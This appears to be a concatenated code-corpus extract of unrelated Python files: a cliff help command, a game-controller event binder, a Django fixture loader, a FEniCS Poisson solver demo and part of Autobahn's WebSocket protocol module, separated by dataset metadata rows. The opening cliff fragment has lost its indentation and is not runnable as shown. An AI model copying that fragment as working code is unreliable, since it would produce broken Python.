app.stdout.write('Could not instantiate %r: %s\n' % (ep, err))
if namespace.debug:
traceback.print_exc(file=app.stdout)
continue
one_liner = cmd.get_description().split('\n')[0]
dist_name = dist_for_obj(factory)
if dist_name and dist_name != app_dist:
dist_info = ' (' + dist_name + ')'
else:
dist_info = ''
app.stdout.write(' %-13s %s%s\n' % (name, one_liner, dist_info))
raise HelpExit()
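# --- Editor's illustrative sketch (not part of cliff itself) ---
# How an application would typically wire HelpAction into its option parser: the
# action is registered with nargs=0 and the running application instance passed as
# the ``default`` value, which is how __call__ above reaches app.command_manager.
# The parser is assumed to have been created with add_help=False, and both objects
# are assumed to be built elsewhere by the application.
def _example_register_help_action(parser, app):
    parser.add_argument(
        '-h', '--help',
        action=HelpAction,
        nargs=0,
        default=app,
        help="Show help message and exit.",
    )
    return parser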
class HelpCommand(command.Command):
"""print detailed help for another command
"""
def get_parser(self, prog_name):
parser = super(HelpCommand, self).get_parser(prog_name)
parser.add_argument('cmd',
nargs='*',
help='name of the command',
)
return parser
def take_action(self, parsed_args):
if parsed_args.cmd:
try:
the_cmd = self.app.command_manager.find_command(
parsed_args.cmd,
)
cmd_factory, cmd_name, search_args = the_cmd
except ValueError:
# Did not find an exact match
cmd = parsed_args.cmd[0]
fuzzy_matches = [k[0] for k in self.app.command_manager
if k[0].startswith(cmd)
]
if not fuzzy_matches:
raise
self.app.stdout.write('Command "%s" matches:\n' % cmd)
for fm in sorted(fuzzy_matches):
self.app.stdout.write(' %s\n' % fm)
return
self.app_args.cmd = search_args
kwargs = {}
if 'cmd_name' in inspect.getfullargspec(cmd_factory.__init__).args:
kwargs['cmd_name'] = cmd_name
cmd = cmd_factory(self.app, self.app_args, **kwargs)
full_name = (cmd_name
if self.app.interactive_mode
else ' '.join([self.app.NAME, cmd_name])
)
cmd_parser = cmd.get_parser(full_name)
cmd_parser.print_help(self.app.stdout)
else:
action = HelpAction(None, None, default=self.app)
action(self.app.parser, self.app.options, None, None)
return 0
| apache-2.0 | -4,748,475,090,079,885,000 | 37.768 | 79 | 0.554065 | false |
ApproxEng/approxeng.input | src/python/approxeng/input/selectbinder.py | 1 | 6065 | from functools import reduce
from select import select
from threading import Thread
import approxeng.input.sys as sys
from approxeng.input.controllers import *
EV_KEY = 1
EV_REL = 2
EV_ABS = 3
class ControllerResource:
"""
General resource which binds one or more controllers on entry and unbinds the event listening thread on exit.
"""
def __init__(self, *requirements, print_events=False, **kwargs):
"""
Create a new resource to bind and access one or more controllers. If no additional arguments are supplied this
will find the first controller of any kind enabled by the library. Otherwise the requirements must be provided
        as a list of ControllerRequirement instances.
:param ControllerRequirement requirements:
ControllerRequirement instances used, in order, to find and bind controllers. If empty this will
be equivalent to supplying a single unfiltered requirement and will match the first specified controller.
:param bool print_events:
Defaults to False, if set to True then all events picked up by the binder will be printed to stdout. Use
this when you're trying to figure out what events correspond to what axes and buttons!
:param kwargs:
Any addition keyword arguments are passed to the constructors for the controller classes. This is useful
particularly to specify e.g. dead and hot zone ranges on discovery.
:raises ControllerNotFoundError:
If the requirement can't be satisfied, or no requirements are specified but there aren't any controllers.
"""
self.discoveries = find_matching_controllers(*requirements, **kwargs)
self.unbind = None
self.print_events = print_events
def __enter__(self):
"""
Called on entering the resource block, returns the controller passed into the constructor.
"""
self.unbind = bind_controllers(*self.discoveries, print_events=self.print_events)
if len(self.discoveries) == 1:
return self.discoveries[0].controller
else:
return tuple(discovery.controller for discovery in self.discoveries)
def __exit__(self, exc_type, exc_value, traceback):
"""
Called on resource exit, unbinds the controller, removing the listening thread.
"""
self.unbind()
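# --- Editor's illustrative sketch (not part of the original module) ---
# Typical use of ControllerResource as a context manager. The axis name 'lx', the
# button name 'cross' and the 'connected' attribute are assumptions -- the names
# that actually exist depend on the controller class that ends up being bound.
def _example_controller_loop():
    with ControllerResource() as joystick:
        while joystick.connected:
            left_x = joystick['lx']
            presses = joystick.check_presses()
            if 'cross' in presses:
                print('cross pressed, left stick x = {}'.format(left_x))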
def bind_controllers(*discoveries, print_events=False):
"""
Bind a controller or controllers to a set of evdev InputDevice instances, starting a thread to keep those
controllers in sync with the state of the hardware.
:param ControllerDiscovery discoveries:
ControllerDiscovery instances specifying the controllers and their associated input devices
:param bool print_events:
Defaults to False, if set to True then all events picked up by this binder will be printed to stdout
:return:
A function which can be used to stop the event reading thread and unbind from the device
"""
discoveries = list(discoveries)
class SelectThread(Thread):
def __init__(self):
Thread.__init__(self, name='evdev select thread')
self.daemon = True
self.running = True
self.device_to_controller_discovery = {}
for discovery in discoveries:
for d in discovery.devices:
self.device_to_controller_discovery[d.fn] = discovery
self.all_devices = reduce(lambda x, y: x + y, [discovery.devices for discovery in discoveries])
def run(self):
for discovery in discoveries:
discovery.controller.device_unique_name = discovery.name
while self.running:
try:
r, w, x = select(self.all_devices, [], [], 0.5)
for fd in r:
active_device = fd
controller_discovery = self.device_to_controller_discovery[active_device.fn]
controller = controller_discovery.controller
controller_devices = controller_discovery.devices
prefix = None
if controller.node_mappings is not None and len(controller_devices) > 1:
try:
prefix = controller.node_mappings[active_device.name]
except KeyError:
pass
for event in active_device.read():
if print_events:
print(event)
if event.type == EV_ABS or event.type == EV_REL:
controller.axes.axis_updated(event, prefix=prefix)
elif event.type == EV_KEY:
# Button event
if event.value == 1:
# Button down
controller.buttons.button_pressed(event.code, prefix=prefix)
elif event.value == 0:
# Button up
controller.buttons.button_released(event.code, prefix=prefix)
except Exception as e:
self.stop(e)
def stop(self, exception=None):
for discovery in discoveries:
discovery.controller.device_unique_name = None
discovery.controller.exception = exception
self.running = False
polling_thread = SelectThread()
# Force an update of the LED and battery system cache
sys.scan_cache(force_update=True)
for device in polling_thread.all_devices:
device.grab()
def unbind():
polling_thread.stop()
for dev in polling_thread.all_devices:
try:
dev.ungrab()
except IOError:
pass
polling_thread.start()
return unbind
| apache-2.0 | -2,654,246,842,321,006,600 | 40.541096 | 118 | 0.591096 | false |
bcgov/gwells | app/backend/submissions/data_migrations.py | 1 | 1059 | """
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
from gwells.codes import CodeFixture
def well_activity_code():
fixture = 'migrations/well_activity_codes.json'
fixture_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), fixture)
return CodeFixture(fixture_path)
def load_well_activity_codes(apps, schema_editor):
return well_activity_code().load_fixture(apps, schema_editor)
def unload_well_activity_codes(apps, schema_editor):
return well_activity_code().unload_fixture(apps, schema_editor) | apache-2.0 | 1,116,388,698,056,418,700 | 35.551724 | 85 | 0.738432 | false |
akshmakov/Dolfin-Fijee-Fork | test/unit/book/python/chapter_1_files/stationary/poisson/d2_p2D.py | 1 | 1457 | """
FEniCS tutorial demo program: Poisson equation with Dirichlet conditions.
As d1_p2D.py, but choosing the linear solver and preconditioner is demonstrated.
-Laplace(u) = f on the unit square.
u = u0 on the boundary.
u0 = u = 1 + x^2 + 2y^2, f = -6.
"""
from dolfin import *
# Create mesh and define function space
mesh = UnitSquareMesh(60, 40)
V = FunctionSpace(mesh, 'Lagrange', 1)
# Define boundary conditions
u0 = Expression('1 + x[0]*x[0] + 2*x[1]*x[1]')
def u0_boundary(x, on_boundary):
return on_boundary
bc = DirichletBC(V, u0, u0_boundary)
# Define variational problem
u = TrialFunction(V)
v = TestFunction(V)
f = Constant(-6.0)
a = inner(nabla_grad(u), nabla_grad(v))*dx
L = f*v*dx
# Compute solution
u = Function(V)
info(parameters, True)
prm = parameters['krylov_solver'] # short form
prm['absolute_tolerance'] = 1E-5
prm['relative_tolerance'] = 1E-3
prm['maximum_iterations'] = 1000
#prm['preconditioner']['ilu']['fill_level'] = 0
print parameters['linear_algebra_backend']
#set_log_level(PROGRESS)
set_log_level(DEBUG)
solve(a == L, u, bc,
solver_parameters={'linear_solver': 'cg',
'preconditioner': 'ilu'})
# Alternative syntax
solve(a == L, u, bc,
solver_parameters=dict(linear_solver='cg',
preconditioner='ilu'))
# Plot solution and mesh
#plot(u)
#plot(mesh)
# Dump solution to file in VTK format
file = File('poisson.pvd')
file << u
# Hold plot
interactive()
| gpl-3.0 | -481,046,481,958,258,050 | 22.885246 | 75 | 0.663693 | false |
danielfaust/AutobahnPython | autobahn/autobahn/websocket.py | 1 | 140218 | ###############################################################################
##
## Copyright 2011,2012 Tavendo GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
## The Python urlparse module currently does not contain the ws/wss
## schemes, so we add those dynamically (which is a hack of course).
##
import urlparse
wsschemes = ["ws", "wss"]
urlparse.uses_relative.extend(wsschemes)
urlparse.uses_netloc.extend(wsschemes)
urlparse.uses_params.extend(wsschemes)
urlparse.uses_query.extend(wsschemes)
urlparse.uses_fragment.extend(wsschemes)
from twisted.internet import reactor, protocol
from twisted.python import log
import urllib
import binascii
import hashlib
import base64
import struct
import random
import os
from array import array
from collections import deque
from utf8validator import Utf8Validator
from xormasker import XorMaskerNull, XorMaskerSimple, XorMaskerShifted1
from httpstatus import *
import autobahn # need autobahn.version
def createWsUrl(hostname, port = None, isSecure = False, path = None, params = None):
"""
   Create a WebSocket URL from components.
:param hostname: WebSocket server hostname.
:type hostname: str
:param port: WebSocket service port or None (to select default ports 80/443 depending on isSecure).
:type port: int
:param isSecure: Set True for secure WebSockets ("wss" scheme).
:type isSecure: bool
:param path: Path component of addressed resource (will be properly URL escaped).
:type path: str
:param params: A dictionary of key-values to construct the query component of the addressed resource (will be properly URL escaped).
:type params: dict
   :returns: str -- Constructed WebSocket URL.
"""
if port is not None:
netloc = "%s:%d" % (hostname, port)
else:
if isSecure:
netloc = "%s:443" % hostname
else:
netloc = "%s:80" % hostname
if isSecure:
scheme = "wss"
else:
scheme = "ws"
if path is not None:
ppath = urllib.quote(path)
else:
ppath = "/"
if params is not None:
query = urllib.urlencode(params)
else:
query = None
return urlparse.urlunparse((scheme, netloc, ppath, None, query, None))
def parseWsUrl(url):
"""
Parses as WebSocket URL into it's components and returns a tuple (isSecure, host, port, resource, path, params).
isSecure is a flag which is True for wss URLs.
host is the hostname or IP from the URL.
port is the port from the URL or standard port derived from scheme (ws = 80, wss = 443).
resource is the /resource name/ from the URL, the /path/ together with the (optional) /query/ component.
path is the /path/ component properly unescaped.
params is the /query) component properly unescaped and returned as dictionary.
:param url: A valid WebSocket URL, i.e. ws://localhost:9000/myresource?param1=23¶m2=666
:type url: str
:returns: tuple -- A tuple (isSecure, host, port, resource, path, params)
"""
parsed = urlparse.urlparse(url)
if parsed.scheme not in ["ws", "wss"]:
raise Exception("invalid WebSocket scheme '%s'" % parsed.scheme)
if parsed.port is None or parsed.port == "":
if parsed.scheme == "ws":
port = 80
else:
port = 443
else:
port = int(parsed.port)
if parsed.fragment is not None and parsed.fragment != "":
raise Exception("invalid WebSocket URL: non-empty fragment '%s" % parsed.fragment)
if parsed.path is not None and parsed.path != "":
ppath = parsed.path
path = urllib.unquote(ppath)
else:
ppath = "/"
path = ppath
if parsed.query is not None and parsed.query != "":
resource = ppath + "?" + parsed.query
params = urlparse.parse_qs(parsed.query)
else:
resource = ppath
params = {}
return (parsed.scheme == "wss", parsed.hostname, port, resource, path, params)
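## Example (illustrative sketch, not part of the original module): decomposing
## a WebSocket URL with parseWsUrl(). The URL is the placeholder from the
## docstring above.
##
def _exampleParseWsUrl():
   """
   Returns (False, "localhost", 9000, "/myservice?foo=23&foo=66&bar=2",
   "/myservice", {'foo': ['23', '66'], 'bar': ['2']}).
   """
   return parseWsUrl("ws://localhost:9000/myservice?foo=23&foo=66&bar=2")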
def connectWS(factory, contextFactory = None, timeout = 30, bindAddress = None):
"""
   Establish a WebSockets connection to a server. The connection parameters like target
host, port, resource and others are provided via the factory.
:param factory: The WebSockets protocol factory to be used for creating client protocol instances.
:type factory: An :class:`autobahn.websocket.WebSocketClientFactory` instance.
:param contextFactory: SSL context factory, required for secure WebSockets connections ("wss").
:type contextFactory: A twisted.internet.ssl.ClientContextFactory instance.
:param timeout: Number of seconds to wait before assuming the connection has failed.
:type timeout: int
:param bindAddress: A (host, port) tuple of local address to bind to, or None.
:type bindAddress: tuple
:returns: obj -- An object which provides twisted.interface.IConnector.
"""
if factory.isSecure:
if contextFactory is None:
# create default client SSL context factory when none given
from twisted.internet import ssl
contextFactory = ssl.ClientContextFactory()
conn = reactor.connectSSL(factory.host, factory.port, factory, contextFactory, timeout, bindAddress)
else:
conn = reactor.connectTCP(factory.host, factory.port, factory, timeout, bindAddress)
return conn
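## Example (illustrative sketch, not part of the original module): a minimal
## echo client wired up via connectWS(). The URL and protocol behavior are
## placeholders; WebSocketClientProtocol and WebSocketClientFactory are defined
## further below in this module, and the factory is assumed to accept a ws://
## URL as in the project's examples.
##
def _exampleEchoClient():
   class EchoClientProtocol(WebSocketClientProtocol):
      def onOpen(self):
         self.sendMessage("Hello, world!")
      def onMessage(self, msg, binary):
         log.msg("got echo: %s" % msg)
   factory = WebSocketClientFactory("ws://localhost:9000")
   factory.protocol = EchoClientProtocol
   connectWS(factory)
   reactor.run()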
def listenWS(factory, contextFactory = None, backlog = 50, interface = ''):
"""
Listen for incoming WebSocket connections from clients. The connection parameters like
listening port and others are provided via the factory.
:param factory: The WebSockets protocol factory to be used for creating server protocol instances.
:type factory: An :class:`autobahn.websocket.WebSocketServerFactory` instance.
:param contextFactory: SSL context factory, required for secure WebSockets connections ("wss").
:type contextFactory: A twisted.internet.ssl.ContextFactory.
:param backlog: Size of the listen queue.
:type backlog: int
:param interface: The interface (derived from hostname given) to bind to, defaults to '' (all).
:type interface: str
:returns: obj -- An object that provides twisted.interface.IListeningPort.
"""
if factory.isSecure:
if contextFactory is None:
raise Exception("Secure WebSocket listen requested, but no SSL context factory given")
listener = reactor.listenSSL(factory.port, factory, contextFactory, backlog, interface)
else:
listener = reactor.listenTCP(factory.port, factory, backlog, interface)
return listener
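## Example (illustrative sketch, not part of the original module): a minimal
## echo server wired up via listenWS(). The URL and protocol behavior are
## placeholders; WebSocketServerProtocol and WebSocketServerFactory are defined
## further below in this module, and the factory is assumed to accept a ws://
## URL as in the project's examples.
##
def _exampleEchoServer():
   class EchoServerProtocol(WebSocketServerProtocol):
      def onMessage(self, msg, binary):
         self.sendMessage(msg, binary)
   factory = WebSocketServerFactory("ws://localhost:9000")
   factory.protocol = EchoServerProtocol
   listenWS(factory)
   reactor.run()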
class FrameHeader:
"""
Thin-wrapper for storing WebSockets frame metadata.
FOR INTERNAL USE ONLY!
"""
def __init__(self, opcode, fin, rsv, length, mask):
"""
Constructor.
:param opcode: Frame opcode (0-15).
:type opcode: int
:param fin: Frame FIN flag.
:type fin: bool
:param rsv: Frame reserved flags (0-7).
:type rsv: int
:param length: Frame payload length.
:type length: int
:param mask: Frame mask (binary string) or None.
:type mask: str
"""
self.opcode = opcode
self.fin = fin
self.rsv = rsv
self.length = length
self.mask = mask
class HttpException():
"""
Throw an instance of this class to deny a WebSockets connection
during handshake in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect`.
You can find definitions of HTTP status codes in module :mod:`autobahn.httpstatus`.
"""
def __init__(self, code, reason):
"""
Constructor.
:param code: HTTP error code.
:type code: int
:param reason: HTTP error reason.
:type reason: str
"""
self.code = code
self.reason = reason
class ConnectionRequest():
"""
Thin-wrapper for WebSockets connection request information
provided in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect` when a WebSockets
client establishes a connection to a WebSockets server.
"""
def __init__(self, peer, peerstr, headers, host, path, params, version, origin, protocols, extensions):
"""
Constructor.
:param peer: IP address/port of the connecting client.
:type peer: object
:param peerstr: IP address/port of the connecting client as string.
:type peerstr: str
:param headers: HTTP headers from opening handshake request.
:type headers: dict
:param host: Host from opening handshake HTTP header.
:type host: str
:param path: Path from requested HTTP resource URI. For example, a resource URI of "/myservice?foo=23&foo=66&bar=2" will be parsed to "/myservice".
:type path: str
:param params: Query parameters (if any) from requested HTTP resource URI. For example, a resource URI of "/myservice?foo=23&foo=66&bar=2" will be parsed to {'foo': ['23', '66'], 'bar': ['2']}.
:type params: dict of arrays of strings
:param version: The WebSockets protocol version the client announced (and will be spoken, when connection is accepted).
:type version: int
:param origin: The WebSockets origin header or None. Note that this only a reliable source of information for browser clients!
:type origin: str
:param protocols: The WebSockets (sub)protocols the client announced. You must select and return one of those (or None) in :meth:`autobahn.websocket.WebSocketServerProtocol.onConnect`.
:type protocols: array of strings
:param extensions: The WebSockets extensions the client requested and the server accepted (and thus will be spoken, when WS connection is established).
:type extensions: array of strings
"""
self.peer = peer
self.peerstr = peerstr
self.headers = headers
self.host = host
self.path = path
self.params = params
self.version = version
self.origin = origin
self.protocols = protocols
self.extensions = extensions
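## Example (illustrative sketch, not part of the original module): how a
## server-side onConnect() handler might use a ConnectionRequest to select a
## subprotocol or deny the connection. The "echo" subprotocol name is a
## placeholder.
##
def _exampleOnConnect(request):
   if "echo" in request.protocols:
      return "echo"
   raise HttpException(403, "none of the requested subprotocols is supported")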
class ConnectionResponse():
"""
Thin-wrapper for WebSockets connection response information
provided in :meth:`autobahn.websocket.WebSocketClientProtocol.onConnect` when a WebSockets
client has established a connection to a WebSockets server.
"""
def __init__(self, peer, peerstr, headers, version, protocol, extensions):
"""
Constructor.
:param peer: IP address/port of the connected server.
:type peer: object
:param peerstr: IP address/port of the connected server as string.
:type peerstr: str
:param headers: HTTP headers from opening handshake response.
:type headers: dict
:param version: The WebSockets protocol version that is spoken.
:type version: int
:param protocol: The WebSockets (sub)protocol in use.
:type protocol: str
:param extensions: The WebSockets extensions in use.
:type extensions: array of strings
"""
self.peer = peer
self.peerstr = peerstr
self.headers = headers
self.version = version
self.protocol = protocol
self.extensions = extensions
def parseHttpHeader(data):
"""
Parses the beginning of a HTTP request header (the data up to the \n\n line) into a pair
of status line and HTTP headers dictionary.
Header keys are normalized to all-lower-case.
FOR INTERNAL USE ONLY!
:param data: The HTTP header data up to the \n\n line.
:type data: str
"""
raw = data.splitlines()
http_status_line = raw[0].strip()
http_headers = {}
http_headers_cnt = {}
for h in raw[1:]:
i = h.find(":")
if i > 0:
## HTTP header keys are case-insensitive
key = h[:i].strip().lower()
## not sure if UTF-8 is allowed for HTTP header values..
value = h[i+1:].strip().decode("utf-8")
## handle HTTP headers split across multiple lines
if http_headers.has_key(key):
http_headers[key] += ", %s" % value
http_headers_cnt[key] += 1
else:
http_headers[key] = value
http_headers_cnt[key] = 1
else:
# skip bad HTTP header
pass
return (http_status_line, http_headers, http_headers_cnt)
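## Example (illustrative sketch, not part of the original module): feeding a
## (placeholder) HTTP upgrade request head to parseHttpHeader(). Header keys
## come back lower-cased; duplicate headers are merged, with per-key counts in
## the third return value.
##
def _exampleParseHttpHeader():
   raw = "GET /chat HTTP/1.1\r\n" \
         "Host: example.com\r\n" \
         "Upgrade: websocket\r\n" \
         "Connection: Upgrade\r\n"
   status_line, headers, header_count = parseHttpHeader(raw)
   ## status_line == "GET /chat HTTP/1.1"
   ## headers["upgrade"] == u"websocket"
   return (status_line, headers, header_count)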
class WebSocketProtocol(protocol.Protocol):
"""
A Twisted Protocol class for WebSockets. This class is used by both WebSocket
client and server protocol version. It is unusable standalone, for example
the WebSockets initial handshake is implemented in derived class differently
for clients and servers.
"""
SUPPORTED_SPEC_VERSIONS = [0, 10, 11, 12, 13, 14, 15, 16, 17, 18]
"""
WebSockets protocol spec (draft) versions supported by this implementation.
Use of version 18 indicates RFC6455. Use of versions < 18 indicate actual
draft spec versions (Hybi-Drafts). Use of version 0 indicates Hixie-76.
"""
SUPPORTED_PROTOCOL_VERSIONS = [0, 8, 13]
"""
WebSocket protocol versions supported by this implementation. For Hixie-76,
there is no protocol version announced in HTTP header, and we just use the
draft version (0) in this case.
"""
SPEC_TO_PROTOCOL_VERSION = {0: 0, 10: 8, 11: 8, 12: 8, 13: 13, 14: 13, 15: 13, 16: 13, 17: 13, 18: 13}
"""
Mapping from protocol spec (draft) version to protocol version. For Hixie-76,
there is no protocol version announced in HTTP header, and we just use the
pseudo protocol version 0 in this case.
"""
PROTOCOL_TO_SPEC_VERSION = {0: 0, 8: 12, 13: 18}
"""
Mapping from protocol version to the latest protocol spec (draft) version
using that protocol version. For Hixie-76, there is no protocol version
announced in HTTP header, and we just use the draft version (0) in this case.
"""
DEFAULT_SPEC_VERSION = 10
"""
Default WebSockets protocol spec version this implementation speaks.
We use Hybi-10, since this is what is currently targeted by widely distributed
browsers (namely Firefox 8 and the like).
"""
DEFAULT_ALLOW_HIXIE76 = False
"""
By default, this implementation will not allow to speak the obsoleted
Hixie-76 protocol version. That protocol version has security issues, but
is still spoken by some clients. Enable at your own risk! Enabling can be
done by using setProtocolOptions() on the factories for clients and servers.
"""
WS_MAGIC = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
"""
Protocol defined magic used during WebSocket handshake (used in Hybi-drafts
and final RFC6455.
"""
QUEUED_WRITE_DELAY = 0.00001
"""For synched/chopped writes, this is the reactor reentry delay in seconds."""
PAYLOAD_LEN_XOR_BREAKEVEN = 128
"""Tuning parameter which chooses XORer used for masking/unmasking based on
payload length."""
MESSAGE_TYPE_TEXT = 1
"""WebSockets text message type (UTF-8 payload)."""
MESSAGE_TYPE_BINARY = 2
"""WebSockets binary message type (arbitrary binary payload)."""
## WebSockets protocol state:
## STATE_CONNECTING => STATE_OPEN => STATE_CLOSING => STATE_CLOSED
##
STATE_CLOSED = 0
STATE_CONNECTING = 1
STATE_CLOSING = 2
STATE_OPEN = 3
## Streaming Send State
SEND_STATE_GROUND = 0
SEND_STATE_MESSAGE_BEGIN = 1
SEND_STATE_INSIDE_MESSAGE = 2
SEND_STATE_INSIDE_MESSAGE_FRAME = 3
## WebSockets protocol close codes
##
CLOSE_STATUS_CODE_NORMAL = 1000
"""Normal close of connection."""
CLOSE_STATUS_CODE_GOING_AWAY = 1001
"""Going away."""
CLOSE_STATUS_CODE_PROTOCOL_ERROR = 1002
"""Protocol error."""
CLOSE_STATUS_CODE_UNSUPPORTED_DATA = 1003
"""Unsupported data."""
CLOSE_STATUS_CODE_RESERVED1 = 1004
"""RESERVED"""
CLOSE_STATUS_CODE_NULL = 1005 # MUST NOT be set in close frame!
"""No status received. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODE_ABNORMAL_CLOSE = 1006 # MUST NOT be set in close frame!
"""Abnormal close of connection. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODE_INVALID_PAYLOAD = 1007
"""Invalid frame payload data."""
CLOSE_STATUS_CODE_POLICY_VIOLATION = 1008
"""Policy violation."""
CLOSE_STATUS_CODE_MESSAGE_TOO_BIG = 1009
"""Message too big."""
CLOSE_STATUS_CODE_MANDATORY_EXTENSION = 1010
"""Mandatory extension."""
CLOSE_STATUS_CODE_INTERNAL_ERROR = 1011
"""The peer encountered an unexpected condition or internal error."""
CLOSE_STATUS_CODE_TLS_HANDSHAKE_FAILED = 1015 # MUST NOT be set in close frame!
"""TLS handshake failed, i.e. server certificate could not be verified. (MUST NOT be used as status code when sending a close)."""
CLOSE_STATUS_CODES_ALLOWED = [CLOSE_STATUS_CODE_NORMAL,
CLOSE_STATUS_CODE_GOING_AWAY,
CLOSE_STATUS_CODE_PROTOCOL_ERROR,
CLOSE_STATUS_CODE_UNSUPPORTED_DATA,
CLOSE_STATUS_CODE_INVALID_PAYLOAD,
CLOSE_STATUS_CODE_POLICY_VIOLATION,
CLOSE_STATUS_CODE_MESSAGE_TOO_BIG,
CLOSE_STATUS_CODE_MANDATORY_EXTENSION,
CLOSE_STATUS_CODE_INTERNAL_ERROR]
"""Status codes allowed to send in close."""
def onOpen(self):
"""
Callback when initial WebSockets handshake was completed. Now you may send messages.
Default implementation does nothing. Override in derived class.
Modes: Hybi, Hixie
"""
if self.debugCodePaths:
log.msg("WebSocketProtocol.onOpen")
def onMessageBegin(self, opcode):
"""
Callback when receiving a new message has begun. Default implementation will
prepare to buffer message frames. Override in derived class.
Modes: Hybi, Hixie
:param opcode: Opcode of message.
:type opcode: int
"""
self.message_opcode = opcode
self.message_data = []
self.message_data_total_length = 0
def onMessageFrameBegin(self, length, reserved):
"""
Callback when receiving a new message frame has begun. Default implementation will
prepare to buffer message frame data. Override in derived class.
Modes: Hybi
:param length: Payload length of message frame which is to be received.
:type length: int
:param reserved: Reserved bits set in frame (an integer from 0 to 7).
:type reserved: int
"""
if not self.failedByMe:
self.message_data_total_length += length
if self.maxMessagePayloadSize > 0 and self.message_data_total_length > self.maxMessagePayloadSize:
self.wasMaxMessagePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_MESSAGE_TOO_BIG, "message exceeds payload limit of %d octets" % self.maxMessagePayloadSize)
elif self.maxFramePayloadSize > 0 and length > self.maxFramePayloadSize:
self.wasMaxFramePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_POLICY_VIOLATION, "frame exceeds payload limit of %d octets" % self.maxFramePayloadSize)
else:
self.frame_length = length
self.frame_reserved = reserved
self.frame_data = []
def onMessageFrameData(self, payload):
"""
      Callback when receiving data within a message frame. Default implementation will
buffer data for frame. Override in derived class.
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
:param payload: Partial payload for message frame.
:type payload: str
"""
if not self.failedByMe:
if self.websocket_version == 0:
self.message_data_total_length += len(payload)
if self.maxMessagePayloadSize > 0 and self.message_data_total_length > self.maxMessagePayloadSize:
self.wasMaxMessagePayloadSizeExceeded = True
self.failConnection(WebSocketProtocol.CLOSE_STATUS_CODE_MESSAGE_TOO_BIG, "message exceeds payload limit of %d octets" % self.maxMessagePayloadSize)
self.message_data.append(payload)
else:
self.frame_data.append(payload)
def onMessageFrameEnd(self):
"""
Callback when a message frame has been completely received. Default implementation
will flatten the buffered frame data and callback onMessageFrame. Override
in derived class.
Modes: Hybi
"""
if not self.failedByMe:
self.onMessageFrame(self.frame_data, self.frame_reserved)
self.frame_data = None
def onMessageFrame(self, payload, reserved):
"""
Callback fired when complete message frame has been received. Default implementation
will buffer frame for message. Override in derived class.
Modes: Hybi
:param payload: Message frame payload.
:type payload: list of str
:param reserved: Reserved bits set in frame (an integer from 0 to 7).
:type reserved: int
"""
if not self.failedByMe:
self.message_data.extend(payload)
def onMessageEnd(self):
"""
Callback when a message has been completely received. Default implementation
will flatten the buffered frames and callback onMessage. Override
in derived class.
Modes: Hybi, Hixie
"""
if not self.failedByMe:
payload = ''.join(self.message_data)
self.onMessage(payload, self.message_opcode == WebSocketProtocol.MESSAGE_TYPE_BINARY)
self.message_data = None
def onMessage(self, payload, binary):
"""
Callback when a complete message was received. Default implementation does nothing.
Override in derived class.
Modes: Hybi, Hixie
:param payload: Message payload (UTF-8 encoded text string or binary string). Can also be an empty string, when message contained no payload.
:type payload: str
:param binary: If True, payload is binary, otherwise text.
:type binary: bool
"""
if self.debug:
log.msg("WebSocketProtocol.onMessage")
def onPing(self, payload):
"""
Callback when Ping was received. Default implementation responds
with a Pong. Override in derived class.
Modes: Hybi
:param payload: Payload of Ping, when there was any. Can be arbitrary, up to 125 octets.
:type payload: str
"""
if self.debug:
log.msg("WebSocketProtocol.onPing")
if self.state == WebSocketProtocol.STATE_OPEN:
self.sendPong(payload)
def onPong(self, payload):
"""
Callback when Pong was received. Default implementation does nothing.
Override in derived class.
Modes: Hybi
:param payload: Payload of Pong, when there was any. Can be arbitrary, up to 125 octets.
"""
if self.debug:
log.msg("WebSocketProtocol.onPong")
def onClose(self, wasClean, code, reason):
"""
Callback when the connection has been closed. Override in derived class.
Modes: Hybi, Hixie
:param wasClean: True, iff the connection was closed cleanly.
:type wasClean: bool
:param code: None or close status code (sent by peer), if there was one (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_*).
:type code: int
      :param reason: None or close reason (sent by peer) (when present, a status code MUST also be present).
:type reason: str
"""
if self.debugCodePaths:
s = "WebSocketProtocol.onClose:\n"
s += "wasClean=%s\n" % wasClean
s += "code=%s\n" % code
s += "reason=%s\n" % reason
s += "self.closedByMe=%s\n" % self.closedByMe
s += "self.failedByMe=%s\n" % self.failedByMe
s += "self.droppedByMe=%s\n" % self.droppedByMe
s += "self.wasClean=%s\n" % self.wasClean
s += "self.wasNotCleanReason=%s\n" % self.wasNotCleanReason
s += "self.localCloseCode=%s\n" % self.localCloseCode
s += "self.localCloseReason=%s\n" % self.localCloseReason
s += "self.remoteCloseCode=%s\n" % self.remoteCloseCode
s += "self.remoteCloseReason=%s\n" % self.remoteCloseReason
log.msg(s)
def onCloseFrame(self, code, reasonRaw):
"""
Callback when a Close frame was received. The default implementation answers by
sending a Close when no Close was sent before. Otherwise it drops
the TCP connection either immediately (when we are a server) or after a timeout
(when we are a client and expect the server to drop the TCP).
Modes: Hybi, Hixie
Notes:
- For Hixie mode, this method is slightly misnamed for historic reasons.
- For Hixie mode, code and reasonRaw are silently ignored.
:param code: None or close status code, if there was one (:class:`WebSocketProtocol`.CLOSE_STATUS_CODE_*).
:type code: int
      :param reasonRaw: None or close reason (when present, a status code MUST also be present).
      :type reasonRaw: str
"""
if self.debugCodePaths:
log.msg("WebSocketProtocol.onCloseFrame")
self.remoteCloseCode = code
